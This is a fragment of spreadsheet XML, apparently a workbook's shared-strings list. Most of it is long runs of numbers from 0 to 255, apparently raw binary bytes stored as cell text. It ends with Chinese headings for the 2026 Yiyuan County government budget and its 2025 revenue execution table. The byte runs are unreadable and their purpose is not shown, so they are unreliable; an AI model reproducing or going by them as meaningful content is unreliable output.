    <t xml:space="preserve">189 231 204 153 115 239 61 59 120 213 110 27 79 175 172 204 233 224 32 156 223 53 70 49 24 181 104 161 246 14 170 187 199 255 102 139 242 130 186 11 6 225 152 45 187 75 37 157 216 199 255 14 178 5 89 4 189 185 72 65 185 173 11 170 233 241 112 171 46 141 110 156 61 212 168 149 218 139 49 76 123 104 80 101 71 157 254 4 208 192 70 149 127 250 251 146 219 117 179 226 63 184 40 142 137 226 111 221 8 222 28 75 237 116 232 87 155 76 74 241 170 157 76 76 41 47 55 27 42 123 143 26 212 16 165 55 72 246 210 243 170 236 150 218 15 140 105 208 22 155 133 246 224 191 185 66 101 209 54 245 210 109 234 253 22 84 207 140 114 117 251 158 170 201 114 142 21 181 226 98 17 107 173 246 199 100 232 122 98 90 207 173 188 98 115 245 247 198 150 77 114 8 51 202 62 31 29 160 30 230 202 161 152 219 21 197 111 77 204 227 227 104 43 241 1 165 174 24 174 211 204 67 69 179 230 237 218 51 7 204 227 6 212 164 196 135 152 9 29 255 175 162 84 135 16 231 14 225 92 188 97 127 46 1 231 242 66 156 123 3 231 170 66 156 139 198 185 78 35 80 107 220 159 206 78 27 173 53 142 45 115 77 225 36 144 125 189 151 43 87 182 80 204 17 200 239 1 255 128 97 245 25 107 162 131 150 51 212 181 138 198 180 168 150 122 206 176 108 156 249 119 243 211 179 72 165 151 52 217 180 172 57 168 140 238 48 114 220 60 217 72 102 27 167 92 146 53 221 104 90 109 140 110 181 124 87 202 42 102 106 77 1 91 24 197 89 89 181 155 31 119 212 31 174 43 167 23 105 26 241 90 2 77 37 71 183 237 86 202 141 89 78 153 1 109 28 29 7 127 162 68 60 141 163 30 171 79 206 245 239 240 248 143 7 233 229 195 206 245 65 223 9 79 22 23 121 229 110 94 47 110 195 53 123 152 125 19 236 190 213 202 57 216 201 145 63 197 226 29 218 122 49 57 62 124 83 23 253 232 119 71 0 67 142 26 31 80 76 142 239 108 164 176 86 252 233 63 250 170 51 24 140 84 110 129 140 230 229 40 66 79 45 234 182 82 146 188 214 122 246 14 21 </t>
  </si>
  <si>
    <t xml:space="preserve">171 123 45 126 253 19 45 220 19 212 230 110 235 188 158 126 164 215 53 237 193 11 207 146 141 150 103 91 253 218 196 247 236 78 171 31 192 226 122 146 223 150 47 115 85 60 208 5 229 116 205 135 173 230 114 38 73 59 190 87 15 95 183 129 71 74 75 160 233 52 254 59 231 249 156 130 181 12 255 47 227 255 205 20 172 192 244 42 90 125 38 107 113 195 99 180 255 131 235 45 15 153 242 53 38 157 203 53 149 253 152 94 74 169 89 83 181 36 47 249 237 73 219 148 210 53 157 83 186 252 73 91 230 121 179 215 228 167 154 217 22 122 85 121 34 127 198 44 33 143 72 186 14 190 75 79 225 46 53 195 80 191 198 61 99 52 110 122 102 83 95 104 171 43 239 142 253 68 189 211 195 215 111 132 180 8 182 153 38 50 44 30 201 146 129 113 159 112 29 225 220 193 181 248 252 19 98 3 56 106 160 11 55 71 253 213 144 107 192 93 2 217 174 85 99 115 46 40 87 165 141 71 180 29 124 127 80 142 19 141 59 187 212 232 118 157 178 110 153 133 226 229 251 151 242 143 58 184 70 23 74 10 240 217 94 30 21 55 113 210 156 23 109 107 227 63 195 72 12 148 46 151 200 214 82 130 177 192 6 140 48 106 121 252 87 108 233 130 120 54 225 218 93 236 23 90 200 51 236 49 67 24 55 223 109 178 37 232 61 215 251 19 252 155 123 160 53 98 243 128 169 147 107 233 125 65 126 236 225 176 109 96 17 207 58 176 37 56 107 239 146 76 120 26 214 153 230 240 199 73 94 155 184 134 34 99 107 174 218 116 253 114 106 59 64 202 39 130 237 54 143 28 159 77 89 253 216 11 113 152 178 27 221 248 172 240 75 110 72 228 50 214 223 177 27 58 149 123 39 103 209 206 206 34 28 7 53 19 252 245 97 186 36 255 85 198 235 150 76 151 221 161 30 129 61 236 208 253 174 200 116 80 210 161 55 171 105 39 243 118 200 2 35 181 103 43 27 100 183 88 104 229 166 22 169 178 22 203 209 6 102 181 82 98 88 15 179 117 171 96 142 66 10 245 98 118 230 174 230 135 32 153 170 124 144 116 143 163 71 194 237 241 16 57 185 123 240 152 117 109 140 224 </t>
  </si>
  <si>
    <t xml:space="preserve">74 203 79 31 160 25 148 155 253 163 238 193 198 33 15 29 159 217 223 178 233 108 221 129 214 184 138 21 245 177 163 177 245 151 246 158 238 238 108 160 249 135 235 47 94 126 161 164 98 255 246 216 209 220 154 199 26 68 197 100 247 59 245 142 1 58 179 107 176 111 112 77 205 174 157 244 249 184 123 235 5 72 255 243 237 228 52 33 134 128 12 60 80 243 128 21 64 5 208 11 188 4 248 128 119 129 147 192 215 192 53 32 38 73 136 57 64 22 80 8 52 2 135 128 215 129 159 128 43 64 116 178 16 137 192 226 100 122 211 136 182 253 161 11 183 116 225 166 46 252 170 11 215 117 225 170 46 140 232 194 47 186 240 179 46 12 235 194 143 186 112 81 23 190 15 152 183 209 133 239 116 225 27 93 248 74 23 206 235 194 231 186 112 78 23 62 211 133 51 186 16 188 6 98 204 148 81 149 145 33 159 218 70 22 48 3 192 83 217 200 1 150 0 24 81 26 179 128 121 0 28 129 145 9 44 144 110 203 72 151 17 180 145 45 19 238 141 4 96 46 144 11 44 20 34 133 116 252 166 210 243 219 74 215 39 148 190 191 84 58 191 162 244 30 157 36 117 159 170 244 191 64 217 64 54 240 40 176 90 217 67 49 80 15 108 84 182 209 10 108 6 182 2 237 192 46 224 25 224 57 160 15 216 7 12 0 7 149 29 29 83 182 228 3 142 3 31 2 31 1 159 0 167 128 33 224 2 240 131 178 183 203 202 230 162 146 165 221 197 43 219 203 86 246 87 12 172 1 170 128 106 182 199 192 127 55 70 110 48 134 71 134 177 27 30 161 227 63 5 31 19 2 234 78 252 205 181 182 20 65 123 89 146 232 200 50 98 204 99 145 224 124 138 78 146 92 19 99 80 145 19 231 197 35 139 85 223 184 173 190 25 215 189 122 127 187 119 55 126 173 213 124 32 137 230 61 197 210 129 21 70 126 149 67 204 245 245 229 164 249 62 46 72 247 197 76 206 0 230 13 188 60 41 19 152 239 19 98 134 207 227 76 241 13 57 99 7 142 26 247 59 240 191 101 12 69 252 139 135 78 53 239 18 238 150 168 222 63 152 16 198 239 207 170 121 70 70 110 250 108 79 21 </t>
  </si>
  <si>
    <t xml:space="preserve">90 66 115 47 225 108 201 65 191 133 181 171 83 181 181 159 87 228 205 253 191 221 135 225 254 254 111 162 94 63 85 20 172 190 54 250 10 246 177 24 212 124 113 248 181 254 183 182 172 218 87 91 231 169 212 107 173 17 127 85 94 29 189 134 61 189 17 238 210 222 35 238 27 173 77 91 104 44 244 160 112 102 58 151 102 138 134 76 122 183 125 17 158 49 107 75 29 98 67 169 17 213 80 150 34 182 149 62 16 213 94 26 21 211 141 125 15 246 197 204 227 48 138 193 227 84 235 147 196 18 31 1 75 162 98 145 171 211 196 146 16 1 75 134 98 145 107 204 196 146 24 22 75 33 179 228 27 133 96 113 240 218 60 113 76 11 139 163 148 57 10 141 82 112 76 210 198 101 196 52 61 44 166 117 204 228 54 214 9 154 117 14 53 118 35 222 164 176 120 221 204 219 104 184 193 58 197 54 15 128 56 147 195 226 172 102 206 46 163 26 156 174 16 235 223 196 58 35 130 150 246 169 150 218 101 80 16 103 74 4 189 122 80 245 106 168 177 50 241 206 140 160 173 175 170 182 218 101 46 16 231 67 17 112 30 87 156 118 25 14 196 57 43 44 206 141 204 121 194 160 156 227 132 113 228 113 208 21 82 35 184 23 207 170 123 81 230 191 16 203 236 176 88 164 151 186 96 72 47 101 230 113 16 207 156 176 120 202 164 183 51 202 216 39 234 185 48 196 53 55 2 125 56 28 82 31 118 249 62 196 153 22 1 103 162 226 180 203 153 33 206 244 144 156 127 3 20 77 8 226 49 20 0 96 67 75 237 61 11 112 20 199 149 189 163 21 90 176 64 11 104 133 48 112 172 49 198 66 230 179 252 36 249 0 179 32 9 68 14 9 253 144 149 128 44 132 180 176 26 47 146 44 173 144 200 17 144 3 123 214 178 158 131 75 161 58 206 5 4 83 92 157 42 241 93 20 155 156 33 134 148 48 164 32 14 73 145 66 193 148 161 238 100 7 167 228 51 33 170 51 103 43 5 102 238 189 215 61 187 179 171 93 89 86 18 95 234 106 158 244 222 76 247 116 191 126 221 211 255 121 251 58 54 207 25 130 103 164 198 8 238 24 33 207 25 35 224 185 80 240 140 166 </t>
  </si>
  <si>
    <t xml:space="preserve">131 131 60 31 31 65 175 177 74 226 189 70 116 45 32 228 58 115 4 61 112 177 196 123 224 208 206 22 114 122 98 4 156 182 8 78 33 141 37 228 52 107 4 181 176 81 226 181 112 46 233 244 152 90 113 43 15 121 61 57 130 82 251 182 40 53 212 41 42 215 105 17 125 157 238 145 107 218 8 198 190 239 72 124 236 67 141 52 228 49 123 4 109 246 132 196 219 44 234 146 125 232 154 190 13 249 164 143 160 180 94 23 165 165 215 192 67 94 79 141 224 29 190 45 222 97 72 243 15 57 205 25 73 191 38 241 126 237 37 215 167 5 99 105 126 48 119 4 121 251 64 228 141 115 121 185 244 247 202 190 74 228 53 239 75 241 42 224 125 155 84 64 95 165 241 157 153 28 88 175 76 14 173 220 231 143 128 159 20 199 249 161 222 91 36 63 199 151 226 135 179 205 116 137 190 168 252 85 104 158 139 198 137 35 218 64 210 40 240 155 11 127 207 192 106 96 204 31 240 44 206 191 102 105 186 251 217 226 222 12 247 115 131 79 184 43 252 217 46 93 172 93 193 39 203 136 123 200 181 28 254 244 174 103 130 174 229 58 87 98 76 189 88 252 97 231 152 168 186 177 248 100 194 176 244 99 177 92 108 95 66 71 150 209 249 153 33 61 89 76 105 226 48 117 101 49 172 245 11 245 101 121 174 162 233 204 50 210 17 212 181 30 120 99 17 45 19 124 98 141 137 241 186 121 64 92 204 153 156 20 156 115 155 180 30 8 120 70 169 215 148 118 248 72 110 214 173 29 88 204 89 45 158 16 165 245 74 118 170 117 195 155 1 73 49 71 230 120 221 106 131 69 140 17 241 67 140 105 241 49 231 136 82 204 209 53 62 230 28 80 10 155 33 153 67 189 19 149 84 88 31 67 37 58 168 101 131 111 236 89 187 20 123 148 129 120 161 149 31 139 57 215 136 143 88 9 153 134 156 121 75 67 174 118 164 136 49 61 30 122 149 4 58 19 12 223 195 75 174 121 77 235 218 227 204 236 253 245 166 77 105 205 191 11 72 9 236 110 199 228 194 249 108 236 215 223 95 143 30 22 94 21 215 181 155 36 214 191 115 87 169 57 142 93 219 93 185 237 119 129 177 241 </t>
  </si>
  <si>
    <t xml:space="preserve">168 205 219 50 31 232 163 47 142 17 170 79 248 233 153 12 88 78 20 106 169 147 132 225 73 180 137 63 77 24 186 68 251 243 143 51 174 252 191 20 63 18 51 126 96 37 110 198 236 6 60 192 240 128 67 70 234 93 63 5 68 85 174 30 241 77 226 3 64 84 223 26 111 98 116 44 237 84 192 39 1 151 2 230 155 248 225 205 155 0 183 0 214 1 238 4 220 7 120 0 240 16 224 171 128 63 4 124 199 196 143 132 184 7 136 7 169 198 65 183 139 159 150 83 0 31 7 68 165 202 116 137 127 221 198 79 6 184 85 28 39 242 136 126 248 25 105 142 216 66 70 149 162 68 97 146 8 29 232 23 47 44 41 140 22 42 109 255 6 248 38 224 5 241 9 230 174 200 7 110 50 227 22 180 25 100 176 0 38 1 206 1 124 90 200 251 93 33 243 15 0 255 29 240 156 137 171 153 94 6 188 1 248 159 128 31 2 226 161 176 40 239 196 199 58 216 196 100 192 73 128 227 5 162 223 116 64 27 224 52 129 154 31 94 31 237 96 170 83 154 170 219 47 69 86 78 198 77 177 57 249 49 247 140 255 228 63 129 109 128 62 241 121 64 212 63 168 35 95 75 216 222 140 41 168 43 44 5 79 203 12 221 227 135 230 53 41 168 177 38 73 163 226 226 205 241 82 156 249 165 111 210 1 209 109 26 31 205 232 69 41 244 191 219 69 79 95 0 215 22 184 22 11 123 37 104 169 100 9 240 129 250 29 111 146 76 9 163 164 248 132 160 137 168 16 180 241 95 35 237 132 56 91 196 94 219 162 89 148 250 35 163 204 18 66 204 212 87 146 126 68 21 197 89 58 234 160 233 239 226 208 242 84 156 9 129 107 176 142 179 88 117 150 131 16 2 180 119 84 66 114 151 144 222 210 224 184 166 136 184 76 196 253 213 177 80 220 60 200 109 173 136 43 177 248 193 70 176 34 114 248 172 248 216 93 35 174 77 164 51 104 102 14 75 91 42 99 39 33 73 183 41 218 182 248 96 157 235 56 235 23 239 155 197 193 220 96 34 52 227 217 48 210 205 131 145 118 41 91 193 42 216 183 88 39 84 241 75 210 207 36 155 61 197 62 217 62 205 62 203 158 49 </t>
  </si>
  <si>
    <t xml:space="preserve">195 228 144 28 113 142 120 199 104 199 35 142 177 142 36 199 120 135 205 49 201 97 82 37 53 65 29 173 38 170 227 212 71 213 41 234 116 117 185 234 84 55 169 21 234 115 106 239 87 190 167 152 198 54 178 191 5 217 83 237 83 237 22 199 24 71 162 99 156 195 234 72 118 164 56 44 32 223 82 117 163 250 190 250 225 31 45 213 63 143 234 78 56 197 142 176 111 183 77 248 51 228 65 50 182 246 135 5 249 223 56 72 29 185 89 244 75 167 133 191 115 24 113 49 236 184 233 63 30 199 78 141 254 197 99 167 77 235 126 241 24 254 54 193 222 32 52 248 171 171 234 234 234 189 246 45 46 123 99 115 157 189 182 206 158 179 190 196 190 189 190 198 53 111 236 216 49 51 5 143 3 251 255 112 243 231 31 255 99 187 134 121 159 253 83 251 59 112 61 113 239 24 93 103 220 123 133 174 197 181 213 110 124 30 220 211 207 101 108 29 244 59 111 254 170 47 40 106 47 12 23 143 152 232 248 97 142 56 80 78 16 253 131 67 228 202 202 221 102 209 226 131 63 194 40 228 254 167 146 181 95 187 88 69 191 98 13 246 47 250 174 32 103 22 182 19 206 242 178 229 79 208 230 36 33 50 38 55 196 23 138 121 248 171 95 28 11 166 8 129 236 17 130 113 175 205 243 106 170 188 120 10 205 109 73 228 61 88 6 33 0 209 187 231 53 54 53 86 51 145 7 167 8 231 28 20 206 185 121 218 39 207 232 147 201 47 41 91 85 150 159 225 64 93 116 163 21 25 96 128 1 6 24 96 128 1 6 24 96 128 1 6 252 229 195 131 31 102 202 74 109 166 92 119 56 75 62 102 205 146 155 0 11 182 100 202 191 118 103 202 47 166 100 200 79 150 166 203 51 155 150 200 119 109 25 242 251 127 147 46 75 240 236 248 254 44 249 127 166 103 200 190 51 89 242 191 108 77 151 231 228 166 203 191 89 149 46 207 158 159 33 191 2 207 95 169 206 148 107 222 200 148 127 144 147 46 39 204 200 144 127 251 86 150 124 250 104 186 220 250 230 108 185 15 194 238 135 244 214 0 239 209 167 50 229 141 5 233 242 205 35 153 242 197 206 76 121 218 214 76 185 0 </t>
  </si>
  <si>
    <t xml:space="preserve">226 154 170 51 228 91 127 159 46 239 57 154 37 239 170 205 144 139 102 102 200 63 237 202 144 95 125 61 83 254 37 240 255 37 132 249 20 120 119 229 129 60 112 191 188 34 83 206 41 74 151 159 249 143 52 249 98 124 134 220 210 145 33 159 152 152 37 191 147 146 37 231 190 145 37 191 5 105 101 64 62 63 123 97 137 252 220 154 116 249 191 236 153 242 143 33 237 55 64 254 37 73 153 242 67 240 123 183 48 157 148 31 83 196 98 250 220 19 78 182 5 48 109 60 95 12 155 4 254 124 106 248 226 88 125 98 147 213 9 180 141 232 17 162 133 68 29 68 187 136 38 19 189 72 180 148 104 55 209 83 68 15 18 245 18 125 153 104 42 81 51 209 62 162 140 211 241 72 95 163 251 114 162 187 136 14 16 189 71 212 67 52 141 104 22 81 39 209 26 162 183 136 174 35 106 33 110 115 232 254 50 209 60 162 110 162 55 136 246 242 144 68 15 19 189 74 244 1 209 219 68 167 18 157 73 180 149 168 157 104 34 209 179 68 55 19 237 33 218 78 180 159 232 105 162 39 137 46 35 106 229 121 39 217 142 211 125 39 209 125 68 23 19 189 67 244 16 209 6 162 57 68 175 88 241 237 184 91 39 58 89 223 221 160 54 164 67 183 165 113 235 205 132 35 45 47 207 207 62 177 96 153 180 227 191 207 136 159 127 224 155 157 155 141 38 219 132 5 141 5 140 142 30 89 56 15 159 226 70 186 119 146 147 174 169 112 197 208 121 41 156 163 94 239 242 8 248 89 28 78 218 63 106 152 136 225 248 38 212 237 147 201 204 3 238 94 120 142 223 87 113 255 166 108 213 146 199 250 167 167 135 213 165 221 97 174 49 65 11 33 253 83 156 44 49 25 210 235 119 80 130 22 22 218 173 198 95 182 204 4 222 136 189 19 156 172 149 113 35 40 184 81 230 143 210 222 209 180 166 183 158 5 179 169 187 163 143 63 90 190 122 33 77 231 44 39 187 5 153 193 60 173 198 118 0 215 116 250 253 37 183 83 222 2 169 237 132 235 14 182 133 126 125 173 253 170 91 251 109 180 102 169 94 211 239 197 31 245 97 216 6 163 219 253 127 3 88 239 180 189 246 52 </t>
  </si>
  <si>
    <t xml:space="preserve">168 31 175 65 189 209 218 67 42 184 223 219 253 120 203 231 5 62 231 137 77 199 190 243 155 154 247 218 199 208 185 218 38 106 43 122 232 1 183 102 137 7 1 121 46 158 200 121 117 78 226 97 173 14 126 189 2 97 227 180 254 23 191 7 183 241 214 144 95 95 211 236 113 45 208 87 105 150 202 240 59 94 28 80 243 28 11 125 57 70 91 241 252 27 93 147 219 229 241 44 90 72 31 42 75 242 132 149 95 52 72 138 227 34 182 101 74 215 204 174 44 12 201 250 106 15 56 30 233 246 74 106 175 27 251 130 211 87 177 163 186 170 246 50 254 209 83 240 156 87 227 241 208 135 95 224 203 45 199 54 146 97 222 149 200 163 16 226 109 22 188 111 232 121 247 134 120 123 7 241 14 179 27 161 109 111 7 221 8 248 45 177 138 90 38 99 67 219 93 224 159 50 7 255 96 21 191 183 233 45 45 172 14 179 180 192 68 188 193 191 243 102 108 164 118 34 52 158 92 110 254 171 125 110 83 133 231 11 243 18 105 107 1 97 28 99 131 194 159 222 122 241 228 119 215 78 177 190 213 202 190 199 178 150 189 133 111 254 133 87 58 139 221 101 43 217 220 130 125 59 206 183 222 216 145 190 237 251 237 203 220 73 149 41 37 146 67 43 59 252 136 141 163 254 39 155 187 154 210 158 229 79 39 149 174 160 116 240 157 242 120 220 31 253 144 111 175 235 215 30 238 19 153 2 231 139 54 147 180 189 241 202 202 29 91 170 138 93 213 57 46 180 189 90 237 13 250 173 108 220 57 200 175 172 170 177 196 229 5 42 220 104 87 24 42 116 181 238 121 105 147 55 247 5 157 59 167 185 129 223 175 110 116 161 113 225 32 175 188 70 87 83 179 199 155 237 118 85 63 175 247 135 123 52 204 174 221 99 98 116 191 14 143 204 115 109 207 174 242 120 244 242 232 188 215 213 232 252 243 235 169 169 4 221 208 130 10 240 235 68 100 126 87 214 53 213 234 203 1 221 165 245 27 234 106 53 63 16 134 155 75 70 59 230 141 193 112 16 162 180 94 68 230 225 188 141 217 85 222 208 125 125 195 206 32 95 204 59 149 154 206 13 97 214 213 54 133 202 118 141 171 14 </t>
  </si>
  <si>
    <t xml:space="preserve">219 161 107 21 157 147 200 19 211 158 173 93 28 42 115 136 23 150 183 13 91 48 130 62 159 107 235 106 189 97 233 134 165 35 210 102 58 185 33 72 89 149 39 84 86 193 124 64 29 8 150 63 220 135 229 105 125 93 80 70 173 79 197 241 89 187 239 156 18 49 23 21 254 87 116 240 17 128 222 189 33 112 103 239 157 100 55 14 231 53 175 82 103 84 227 127 2 175 47 222 105 135 94 180 164 236 89 191 235 206 165 220 126 43 4 88 116 211 95 113 207 95 49 224 175 232 241 87 92 244 87 156 242 87 116 249 43 142 251 43 14 158 193 169 208 162 110 229 156 23 146 252 228 251 254 163 13 112 245 31 245 16 117 19 45 39 154 71 52 139 104 26 209 84 162 22 162 3 15 145 246 17 189 65 244 50 209 139 68 59 137 30 6 74 201 41 231 90 31 98 98 178 73 181 225 108 47 176 4 103 144 129 229 56 215 252 232 31 240 116 5 27 78 98 11 21 31 10 80 168 218 112 50 27 232 15 140 83 58 144 95 113 153 90 52 245 230 7 190 238 111 37 201 83 221 87 82 157 172 12 194 224 228 119 81 247 222 115 24 98 73 82 71 247 103 55 2 253 138 130 12 84 27 78 143 183 250 62 77 218 55 23 186 222 211 102 38 181 249 125 14 120 112 6 181 123 252 10 101 199 231 68 170 96 6 47 249 240 5 204 156 236 100 151 124 152 49 236 175 149 14 188 83 20 44 134 192 52 154 123 95 115 247 66 218 110 243 100 77 118 245 221 192 85 69 193 2 228 57 82 175 23 186 19 39 163 191 223 183 153 248 150 139 57 159 66 105 22 41 29 152 92 177 226 67 174 133 242 98 69 193 0 69 170 13 103 245 126 223 213 135 24 7 11 50 142 36 192 59 37 255 56 228 7 30 243 132 84 27 78 175 149 142 52 206 7 217 21 114 33 129 57 50 43 150 205 170 13 39 226 123 47 38 243 124 225 216 194 243 133 70 194 149 220 227 16 1 93 144 44 46 44 182 250 186 147 246 161 198 137 204 100 21 144 245 93 27 192 226 193 114 85 109 184 52 224 101 172 38 249 126 194 134 87 154 253 15 121 105 254 4 179 238 255 17 214 18 165 163 47 88 156 </t>
  </si>
  <si>
    <t xml:space="preserve">234 53 46 88 22 4 241 255 136 138 89 20 118 57 61 141 154 59 121 129 200 31 47 44 197 151 198 31 102 241 172 231 241 24 229 84 174 161 18 80 109 184 130 114 207 130 233 240 71 254 81 161 138 70 245 164 72 84 52 107 161 90 156 167 175 58 139 110 10 78 170 13 151 40 242 12 33 131 106 59 196 157 92 64 238 228 121 57 61 73 95 121 74 100 85 188 99 81 212 226 197 171 182 78 94 207 133 240 169 156 43 247 228 217 83 124 13 60 229 227 92 80 11 15 130 75 40 165 3 29 197 110 180 165 173 218 22 83 149 193 55 163 16 45 84 242 187 32 224 157 65 85 197 194 217 166 242 36 203 121 121 69 43 225 81 90 177 77 229 121 50 5 43 14 14 181 129 13 93 197 216 128 79 82 186 253 84 85 251 68 85 245 31 237 37 247 13 17 86 161 88 192 184 143 103 30 253 33 181 195 220 179 147 60 55 244 64 113 224 186 49 48 13 87 146 88 11 119 66 92 40 93 173 236 177 116 3 185 93 190 110 239 138 173 123 179 76 205 79 43 249 61 144 67 92 137 6 242 187 158 90 153 236 247 157 5 86 75 87 90 27 147 84 219 102 238 29 32 63 37 217 135 61 163 191 99 51 56 62 22 79 161 81 130 11 194 248 126 230 93 182 117 239 211 166 230 12 37 183 167 48 156 99 183 224 152 40 56 146 135 146 200 217 41 155 144 93 162 198 14 93 212 106 76 238 238 73 88 212 81 222 32 138 84 148 24 224 73 39 74 32 63 174 161 177 223 192 46 87 189 30 184 10 89 12 228 37 198 17 111 168 252 228 15 101 214 64 141 89 82 109 103 233 157 36 138 214 97 75 164 58 215 42 172 17 242 242 89 72 229 51 103 152 185 57 223 43 125 60 42 84 96 32 157 89 42 116 95 158 164 239 208 176 43 11 249 104 162 42 202 46 117 72 33 221 87 33 206 240 88 229 183 1 31 159 135 87 192 6 170 128 33 62 91 47 229 238 195 30 208 203 11 20 135 143 66 55 46 194 85 27 110 83 20 246 5 238 105 189 147 162 180 242 74 70 97 69 160 169 212 69 232 163 221 166 160 135 121 208 78 170 143 84 90 184 27 242 209 158 207 241 69 </t>
  </si>
  <si>
    <t xml:space="preserve">186 111 225 75 228 45 36 48 141 182 76 174 105 239 52 247 32 132 197 253 147 211 15 38 225 171 199 246 113 134 186 55 106 224 151 124 216 0 22 195 240 224 87 176 178 239 189 99 13 244 248 199 4 148 7 56 18 126 205 236 95 101 9 248 204 216 69 174 74 132 218 98 133 128 74 254 193 162 96 151 214 75 217 182 67 207 112 227 97 168 69 6 150 119 106 163 76 254 69 109 20 40 167 225 134 54 104 174 131 204 235 82 131 21 15 203 147 154 142 146 127 170 72 72 219 158 170 181 86 33 109 223 67 109 188 59 78 210 14 232 165 189 163 147 246 222 67 146 22 82 46 226 221 179 214 189 170 239 98 248 43 1 171 127 124 160 208 236 47 50 7 10 45 254 34 75 192 153 232 95 153 40 75 238 147 148 185 83 80 132 180 27 117 13 10 238 6 101 111 142 168 194 215 121 250 103 33 220 105 18 202 23 42 194 171 84 186 88 8 202 134 139 197 193 126 132 15 147 148 112 79 192 2 162 230 153 65 206 64 158 197 255 53 74 120 85 34 151 137 122 26 144 203 119 11 175 43 205 129 14 100 138 210 249 110 147 143 94 192 104 162 233 6 140 143 55 42 29 30 93 131 14 107 139 161 193 66 116 209 74 71 42 15 59 196 184 20 234 96 47 132 87 69 100 109 21 172 7 215 218 252 30 237 125 99 53 0 114 10 73 87 145 12 1 178 40 192 113 244 56 8 36 172 17 224 70 226 133 64 254 237 26 63 233 250 86 62 183 49 240 97 197 133 131 26 28 3 240 204 10 237 131 237 122 146 13 210 71 210 96 63 60 59 4 120 2 240 117 192 183 1 175 3 254 22 240 30 160 37 141 177 20 192 57 128 78 192 114 64 55 224 14 192 253 128 71 0 95 3 60 11 88 34 177 182 119 224 122 11 240 46 224 0 224 168 217 140 205 0 92 8 232 4 60 6 97 138 225 186 25 208 11 184 27 240 18 248 93 6 60 4 247 39 240 25 220 95 1 60 5 247 151 1 223 3 236 3 252 20 15 104 77 135 181 41 224 76 192 197 128 121 128 223 0 252 87 8 15 235 160 54 55 220 127 19 176 29 240 8 224 247 0 223 6 124 15 240 54 224 61 64 243 </t>
  </si>
  <si>
    <t xml:space="preserve">83 176 86 5 76 5 76 7 92 12 152 243 20 47 143 72 29 170 202 236 181 213 245 180 204 174 172 170 145 43 183 54 120 171 234 88 172 245 86 180 245 142 126 29 66 28 106 106 119 84 110 207 88 28 226 216 232 218 190 96 200 149 24 95 97 69 95 151 13 177 146 141 182 210 12 73 176 104 161 110 197 203 133 30 106 253 171 173 175 98 172 128 117 171 34 253 106 54 44 197 5 25 181 97 50 52 106 94 80 198 77 181 161 82 205 118 63 223 228 125 126 56 235 195 200 117 183 88 55 195 219 244 120 86 55 215 209 249 240 98 225 44 202 186 138 191 190 168 171 89 144 226 133 70 93 14 171 93 13 222 188 170 186 26 143 171 145 133 189 173 200 92 208 203 20 111 188 144 199 195 227 174 163 172 52 195 215 174 225 43 79 146 192 83 191 109 208 123 26 84 106 220 43 230 138 91 191 194 14 139 21 206 185 49 202 238 70 248 186 155 13 185 3 129 59 28 95 176 31 17 109 191 33 123 173 254 29 68 174 174 245 171 124 96 181 189 217 195 227 68 180 58 109 87 131 158 185 90 27 98 174 242 117 187 47 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 6 24 96 128 1 127 25 128 191 161 207 162 163 14 233 52 111 86 206 88 27 234 215 57 225 138 159 114 210 132 85 141 80 56 19 233 31 183 197 240 63 60 200 63 142 45 104 198 223 231 179 182 133 112 189 12 215 69 205 100 208 102 80 124 212 1 29 24 36 23 215 239 180 152 162 251 167 198 240 79 139 225 159 5 151 194 149 192 79 2 25 132 142 117 121 54 215 19 215 220 237 217 60 190 230 238 202 97 172 79 23 254 240 26 70 231 159 117 69 156 226 104 161 115 12 203 88 9 171 164 179 96 139 225 110 45 91 207 10 192 141 167 190 174 102 220 152 238 57 243 239 31 134 126 85 192 88 164 253 17 51 27 108 145 36 135 104 25 233 92 106 231 122 173 101 117 116 98 21 194 76 138 85 10 79 209 30 76 147 208 235 228 231 232 32 140 54 119 153 209 238 137 9 100 242 138 147 194 182 69 225 148 67 97 28 108 49 224 211 116 93 69 101 51 135 180 103 </t>
  </si>
  <si>
    <t xml:space="preserve">53 123 209 152 198 78 200 81 21 217 164 65 64 75 100 219 137 43 234 131 78 128 176 92 255 187 134 53 147 174 167 62 108 164 102 56 35 254 168 29 172 201 19 126 14 16 2 234 143 59 132 17 3 7 133 13 231 31 25 35 60 252 56 8 191 86 28 24 211 8 87 212 111 13 73 212 68 86 210 106 232 152 23 70 117 31 45 75 175 167 82 218 70 121 226 250 176 92 182 186 168 241 230 209 81 52 174 224 251 140 99 118 187 68 109 2 107 202 130 102 187 221 74 150 113 176 30 45 108 182 90 185 11 107 217 162 102 180 37 161 153 115 208 172 231 116 199 108 177 162 229 181 181 137 179 86 219 240 22 176 141 117 119 99 44 149 254 81 57 154 46 248 167 210 55 218 33 251 1 75 127 11 82 85 237 111 105 96 73 16 186 191 129 241 43 11 187 82 163 77 106 99 227 122 241 102 220 93 126 233 29 86 95 195 229 0 60 0 237 28 58 155 110 200 125 119 2 96 82 20 220 195 216 37 85 23 71 229 54 55 236 188 111 10 150 83 155 244 213 150 211 159 20 14 168 9 13 122 151 170 38 180 8 15 11 255 164 158 208 194 61 180 79 236 218 243 160 187 129 133 185 67 69 253 85 184 219 219 245 238 144 11 221 232 186 123 87 115 135 187 16 134 114 253 31 131 26 21 206 171 234 3 182 7 26 192 116 24 163 18 0 241 186 103 128 153 212 225 227 10 117 32 78 85 7 86 168 234 125 53 54 132 215 115 83 180 33 66 47 235 16 242 46 219 163 94 120 48 125 96 197 131 132 251 234 131 233 128 123 238 171 159 171 67 227 121 245 254 131 229 234 253 11 231 213 129 101 43 224 250 197 242 14 89 94 221 127 254 242 50 102 113 6 24 96 128 1 6 24 48 124 248 95 253 </t>
  </si>
  <si>
    <t>2026年沂源县政府预算</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="24"/>
        <rFont val="方正小标宋简体"/>
        <charset val="134"/>
      </rPr>
      <t>目</t>
    </r>
    <r>
      <rPr>
        <sz val="24"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t xml:space="preserve">  </t>
    </r>
    <r>
      <rPr>
        <sz val="24"/>
        <rFont val="方正小标宋简体"/>
        <charset val="134"/>
      </rPr>
      <t>录</t>
    </r>
  </si>
  <si>
    <t>第一部分    2025年全县预算执行情况</t>
  </si>
  <si>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="宋体"/>
        <charset val="134"/>
      </rPr>
      <t>表</t>
    </r>
    <r>
      <rPr>
        <sz val="12"/>
        <rFont val="Times New Roman"/>
        <charset val="134"/>
      </rPr>
      <t>1</t>
    </r>
  </si>
  <si>
    <t xml:space="preserve"> 2025年沂源县一般公共预算收入执行情况表</t>
  </si>
